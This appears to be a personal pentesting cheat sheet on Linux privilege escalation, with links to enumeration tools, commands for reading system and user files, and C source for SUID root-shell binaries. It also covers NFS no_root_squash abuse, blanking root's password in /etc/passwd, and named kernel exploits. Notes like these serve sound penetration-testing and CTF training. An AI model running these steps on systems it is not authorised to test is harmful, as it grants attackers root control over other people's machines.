- Basic Linux Privilege Escalation - g0tmi1k
- PayloadsAllTheThings/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
GTFOBins
Linux Privilege Escalation Awesome Script
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub
Scripted Local Linux Enumeration & Privilege Escalation Checks
GitHub - rebootuser/LinEnum
Linux enumeration tool for pentesting and CTFs with verbosity levels
GitHub - diego-treitos/linux-smart-enumeration
Linux privilege escalation auditing tool
GitHub - mzet-/linux-exploit-suggester
A Linux Privilege Escalation Check Script
GitHub - sleventyeleven/linuxprivchecker
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
unix-privesc-check | Kali Linux Tools
Get linux/kernel version
E.g. Linux kali 5.14.0-kali2-arm64 #1 SMP Debian 5.14.9-2kali1 (2021-10-04) aarch64 GNU/Linux
uname -a
Get "marketing" name of distribution
E.g. Ubuntu 20.04.1 LTS
cat /etc/issue
Get stuff like gcc
E.g. Linux version 5.14.0-kali2-arm64 (devel@kali.org) (gcc-10 (Debian 10.3.0-11) 10.3.0, GNU ld (GNU Binutils for Debian) 2.37) #1 SMP Debian 5.14.9-2kali1 (2021-10-04)
cat /proc/version
-> Use searchsploit
(exploit-db.com), Google, GitHub, etc. to check for public available kernel exploits.
uname -a
cat /etc/issue
cat /proc/version
cat /etc/*-release
Info about current user
id
Check for other users (non-service users normally start at id 1000)
cat /etc/passwd
Filter users with a login shell
grep -vE "nologin|false" /etc/passwd
Interesting unix groups
44(video)
<- has access to video output (weird stuff)6(disk)
<- has raw access to the file system, read disk using e.g.debugfs
Check current privilege status
sudo -l
Todo: LD_PRELOAD
https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/
Find files that have SUID or SGID bit set
find / -type f -perm -04000 -ls 2>/dev/null
List enabled capabilities
getcap -r / 2>/dev/null
cat /etc/crontab
Check for no_root_squash
option in
cat /etc/exports
Mount share
mkdir /tmp/share
mount -o rw <ip>:/share /tmp/share
cd /tmp/share
Create SUID binary
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
Compile it, set SUID bit
gcc binary.c binary -w
chmod +s binary
Run it on target
./binary
See also: PSPY
ps aux
-> Is there something special, maybe related to the users found?
netstat -antup
-> Is any service running, we missed in the port scan (firewall?)
Debian
dpkg -l
CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )
OpenBSD, FreeBSD
pkg_info
Check for manually installed stuff
/var/
/opt/
/usr/local
/usr/local/bin
/usr/local/src
/usr/src
/home/<username>
Look for files that have root privileges but are writeable for everyone -> replace file with exploit
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
Check if available
mount
-> must not have nosuid
mount | grep -vE "nosuid"
setuid.c
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
}
Alternative setuid.c
int main(int argc, char *argv[]) {
setreuid(0, 0);
execve("/bin/sh", NULL, NULL);
}
TODO: This doesn't seem to be working.. Did it ever? Where did I get this from? PWK? 😬
gcc setuid.c -o setuid
sudo chown root:root /tmp/setuid; sudo chmod 4755 /tmp/setuid
Change root, remove the x
(password flag)
root:x:0:0:root:/root:/bin/bash
-> root::0:0:root:/root:/bin/bash
su
-> root
linux - Privilege escalation using passwd file - Information Security Stack Exchange
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel
glibc - 'getcwd()' Local Privilege Escalation 2018 local root exploit
local-root-exploits/linux/CVE-2018-1000001 at master · 5H311-1NJ3C706/local-root-exploits · GitHub